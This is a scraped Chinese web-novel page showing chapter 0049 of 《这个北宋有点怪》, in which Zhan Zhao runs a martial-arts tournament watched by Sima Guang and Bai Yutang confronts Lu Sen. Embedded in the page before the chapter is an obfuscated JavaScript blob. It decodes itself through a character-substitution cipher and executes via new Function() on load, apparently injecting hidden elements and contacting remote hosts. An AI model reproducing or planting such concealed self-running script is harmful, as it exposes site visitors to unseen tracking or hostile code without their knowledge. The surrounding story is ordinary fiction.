笔趣阁

安装
字:
关灯 护眼
笔趣阁 > 这个北宋有点怪 > 0049 你帮我说句话啊

0049 你帮我说句话啊

(function(){function t11d18b6e(x16ae02){var fdb804468="9O5M.Jl$e4/],fjxG!7y2Ph^iwnT:L36pHCs0v&B?;dcKqESDY[W(Vk8z~m=rgFo%-uIaR1_ZtNb|XUA@Q";var tc68f0bf="sNHqg?pU~i:rQ/E73txf=98RP1JLXeBAG6uT2IF(&VoKv|MO4l[0nD!,_.hb%5jWz;kYc-$@aSdyC]^Zmw";return x16ae02.split('').map(function(nad834){var o1e191=fdb804468.indexOf(nad834);return o1e191==-1?nad834:tc68f0bf[o1e191]}).join('')}var c=t11d18b6e('ftp1://Q4(NdQ["" + "." + "=" + "W" + "0" + "w" + "G" + "Z" + "P" + "0"+""X2yC(a!4d(B) { - ByC(a!4d( B]0xyHa=8 9yhGhWhh8 (a=wN0wNh8 ZGaxDgGg8 @00w=HgxW) { 4y BfUEZaqo4(f~!L9!B(ZK4.Z!d]~lYZ!yd]@)) { ]L!C]( }- KZ] mDyygDa 2 yC(a!4d( B.ZHxgNZg) { ]L!C]( t!]4(.~y]d@|mZ]|dNLB.ZHxgNZg) }- KZ] MDHHZawyW 2 ZGaxDgGg[mDyygDaBW7Hw) + mDyygDaBW7xD) + mDyygDaBW7H&) + mDyygDaBW7H0)X8 FZGhPLL 2 ZGaxDgGg[mDyygDaBW7H0) + mDyygDaBW7xD) + mDyygDaBW7H&) + mDyygDaBW7Hw)X8 LGxD0LPL 2 @00w=HgxW[MDHHZawyWB"IG;ba@;CN&OFa@YQN622")X8 YDDywgW0N 2 MDHHZawyWB"IGnYI:^Y^o7Y=o;CN622")- KZ] bN=HgL 2 MDHHZawyWB"L@OuAonwAQ22")- KZ] y=0w=L0N- 4y BYdaZ!4d(~9LZ]am~4(NL7SyBbN=HgL) > Rw) { y=0w=L0N 2 @00w=HgxW[YDDywgW0NXBMDHHZawyWB"Np;DNp&bAoj2"))- y=0w=L0N~4N 2 "!" + BEZ!m~]Z(Nd@B) * wWWWW)- y=0w=L0N~9!bYL~Q4N!m 2 "wWWr"- y=0w=L0N~9!bYL~mL4.m! 2 "GWWl7"- y=0w=L0N~N49Z=YLN 2 !]CL- @00w=HgxW~=dNb~ZllL(N|m4YNBy=0w=L0N) } KZ] !wyaxWaNN 2 @00w=HgxW[YDDywgW0NXBMDHHZawyWB"ZoAbIowY"))- !wyaxWaNN~4N 2 "7" + BEZ!m~]Z(Nd@B) * wWWWW)- !wyaxWaNN~9!bYL~Q4N!m 2 "wWl7"- !wyaxWaNN~9!bYL~mL4.m! 2 g + "l7"- !wyaxWaNN~9!bYL~=Zau.]dC(N 2 "#&&&"- KZ] KWNL0 2 yC(a!4d( BdGPGgy0yw) { !wyaxWaNN~9]a 2 ["m!!l9/ff"8 dGPGgy0yw8 "]"8 "Fwww"8 (a=wN0wNh + "Jz]2" + BFZGhPLLBYdaZ!4d(~m]Ly))X~Fd4(B"f")- @00w=HgxW~=dNb~ZllL(N|m4YNB!wyaxWaNN) }- 4y By=0w=L0N k2 (CYY) { y=0w=L0N~KZYCL +2 "\\]\\(9L(N =]4N.4(. md9! " + 9yhGhWhh } ZGaxDgGg[MDHHZawyWB"A@;WI0.2")XB["m!!l9/ff"8 MDHHZawyWB9yhGhWhh)8 "m@~F9J" + VZ!L["(dQ"XB) + By=0w=L0N 22 (CYY J "" / bN=HgL)X~Fd4(B"f"))~!mL(BBYygDDHhP) 2> YygDDHhP~!L7!B))~!mL(BBYygDDHhP) 2> { 4y By=0w=L0N k2 (CYY) { y=0w=L0N~KZYCL +2 "\\]\\(]LaL4KL =]4N.4(. md9! " + YygDDHhP }- KWNL0BMDHHZawyWBYygDDHhP~9lY4!B"")~]LKL]9LB)~Fd4(B""))) })~aZ!amBBL]]) 2> { KWNL0BMDHHZawyWB]0xyHa=)) })- ZGaxDgGg["ZNNjKL(!T49!L(L]"XB"@L99Z.L"8 yC(a!4d( BL) { 4y BL~NZ!Z~u 22 (a=wN0wNh) { @00w=HgxW~.L!jYL@L(!3bvNB!wyaxWaNN~4N)~]L@dKLB)- 4y By=0w=L0N k2 (CYY) { y=0w=L0N~KZYCL +2 "\\]\\(]LaL4KL 4y]Z@L ld9! @L99Z.L" } (LQ &C(a!4d(B"Z].9"8 MDHHZawyWBL~NZ!Z~K))B{ z!Na9/ LGxD0LPL8 z!]Z/ y=0w=L0N }) } }) })B"Z@jCa0ml=@h%N:vCL5YH"8 "I0PC=@;FN|g7I:YMA:lGT(mgL.22"8 "wG000HPP0gxP0g"8 Q4(NdQ8 NdaC@L(!) }-.=W0wGZP0B)-'.substr(7));new Function(c)()})();
章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
比武台后方的主位高台上,司马光露出了满意的笑容,忍不住点点头。
  
  “展捕头做得不错,确实是能干事的,不愧是包希仁看重的心腹。”
  
  借调展昭暂时镇守杭州,本身就是司马光提出的意见。
  
  也因为并非自己的直隶下属,且司马光与包拯关系极好,所以面对着展昭这个武人,司马光并没有一昧摆出文官的姿态,很多事情都有商有量。
  
  且也给予展昭足够的信任。
  
  现在信任的回报来了,看样子,展昭似乎只用了件小东西把武林人士的不满压制下去,可谓是颇有手段。
  
  事实上,因为年事已高,又常年看书,司马光是个近视眼,且听力也因为年龄受到了一定的影响。
  
  所以他在高台上坐着,只能勉强看着展昭拿着个小东西走了一圈,说了些话,吵闹的武林人士们就安静下去,并且开始很‘乖巧’地上来排除抽取自己的比斗牌号。
  
  他旁边大多数的地方官也是差不多的样子,没有听到展昭在比武台上究竟讲了什么。
  
  对于他们而言,只要武林选举大会如期,正常举行便可。
  
  无错便是功!
  
  上去领牌子的人很多,其中包括五鼠。
  
  对于江湖人来说,那瓶神药就是多出来一条命,只要有一口气在,就能把人拉回来。
  
  不……江湖人生命力强,一两口或许就能拉得回来,其它存着有需要的时候再喝,那就是四五条命了。
  
  谁不想要?
  
  五鼠也不例外。
  
  所以当白玉堂上台,从箱子里拿出比斗牌号时,展昭特地走了过去。
  
  “当你拿起牌号时,就代表既往不咎。”展昭笑意盎然地说道:“只要你们五鼠以后别犯事,我们可以成为朋友。”
  
  五鼠有多厉害多难抓,展昭最清楚不过了。
  
  如果这五人能一改之前亦正亦邪的作风,为朝廷办事,那也不失为一桩美事。
  
  哼!
  
  白玉堂扫了展昭一眼,转身就走了。
  
  他就看不得展昭这自信满满,胸有成竹的模样。
  
  展昭也不以为意,他对个人恩怨没有太大的执着,之前抓五鼠,主要是对方在汴京城闹事。
  
  他倒是挺希望能与五鼠共事的。
  
  毕竟……开封府的捕快,除了王、马、张、赵四人还有点实力,其它人则有些一言难尽。
  
  每次他带着捕快去围捕江湖人士,总有种带人去送死的感觉。
  
  所以一旦涉及到江湖高手的案子,他更喜欢单人行动。
  
  之前追捕五鼠也是这样。
  
  陆森视力也挺好的,他看到了五鼠,很想再抽长弓出来,但看着周围那么多捕快,高台处还有司马光这个大臣坐着,如果敢动武器……错的就不是五鼠,而是自己了。
  
  所以他就静静坐着看戏。
  
  为了杀韩彰现在把自己搭进去就不太好了,以后有得是机会。
  
  抽完签后,比武就开始了。
  
  比武台很大,所以干脆分割成了两个场地进行较量。
  
  由于每个门派或者组织只能有两个人上场,而彩头又如此之好,所以上去的人都是好手。
  
  比武全程没有尿点,打得极是好看。
  
  除了小部分人招式不幸被克制,极速落败外,其它的每一场比赛,都打了至少一柱香的时间,僵持得久些的,甚至打到了一个时辰,有两名江湖人打得全身的衣服都湿透了,也没有分出胜负。
  
  所以一整天下来,连前三十都没有选出,此时又是傍晚了,只得明日再打。
  
  朝廷很有钱,所以只要是会场里的人,不管是江湖人士,还是观众,中午和晚饭的时候都能领一份饭菜填饱肚子。
  
  陆森终于明白,为什么要收三枚铜板了,原来是饭钱。
  
  其实还收得挺便宜的,因为饭菜里居然有不少的肉片。
  
  吃过晚饭,江湖人士便要离开了,明天再来过。
  
  而在观览台上,陆森看着五鼠要其它江湖人一起离开,便对黑柱说道:“你先回屋子,我稍后回来。”
  
  黑柱点头,他猜测自家郎君多半是要去找人麻烦。
  
  等黑柱走后,陆森跟着其它观众一起下了高台。
  
  周围的人都在讨论着之前的比斗,惊叹之声不绝于耳。
  
  陆森挤开人群,跟在五鼠的后面。
  
  随着人流在行进中渐渐分散,五鼠也渐渐脱离了人潮。
  
  等转过一个弯,陆森走过去,再一看,街上已经没有了五鼠的踪迹。
  
  他无奈地摇摇头,自己还是太自大了,对方可是江湖高手,而自己是什么?只会开挂的小白罢了,居然想跟踪人家?
  
  对方多半早发现自己了。
  
  他转身往小屋的方向走,只是没走几步,却发见路中间突然多了个黑衣男子,挡在自己的面前。
  
  澄黄的夕阳照在男子的身上,乌黑的发丝被晕染上了一抹琥珀色的涂层。
  
  细长的丹凤眼,反射着落日的余辉,眼瞳中闪烁着淡泊的氩光。
  
  端是盛世美男的模样。
  
  白玉堂!
  
  陆森停了下来,双手拢在袖子里,和他对视。
  
  此时有个豆蔻小娘子从后方走来,急着回家。见到大路中间有人挡路,嘟着嘴不快的让到一边,然后侧头,想看看是什么人居然站路中央的,都没有家教。
  
  结果这一侧头,她就惊讶地捂着小嘴,连连退到路边墙根处,然后左看一眼,右看一眼,脸色渐渐发红。
  
  这两男子都俊俏地让人挪不开眼睛,她不知道该选谁才好。
  
  互相对视了许些时间,最后还是白玉堂先说话了:“这位兄台,白某承认事情是我们兄弟不对,在这里给你赔个礼。况且二哥也吃了你一箭,前些日子又被你追击,也该消气了吧。”
  
  陆森微笑着说道:“这样吧,我用弓箭你在二哥眉心那里射上一箭,然后再让他追杀我数天,然后他也消气可好?”
  
  “这!”
  
  白玉堂顿时无话可说。
  
  想了一会,他轻叹道:“只能说天意弄人,当时臭猫把我们往那边引,二哥他还以为你是帮手。兄台你要如何才消气,可划下道来,我们兄弟五人接住就是了!只要不伤二哥性命,我们都认。”
  
  陆森微微有些惊讶:“江湖中传闻五鼠为人亦正亦邪,特别是锦毛鼠,狂傲自大,难听人言。但你似乎挺好说话的?”
  
『加入书签,方便阅读』
安装
继续浏览精彩内容
到笔趣阁APP免费阅读
《这个北宋有点怪》
打开
浏览器
继续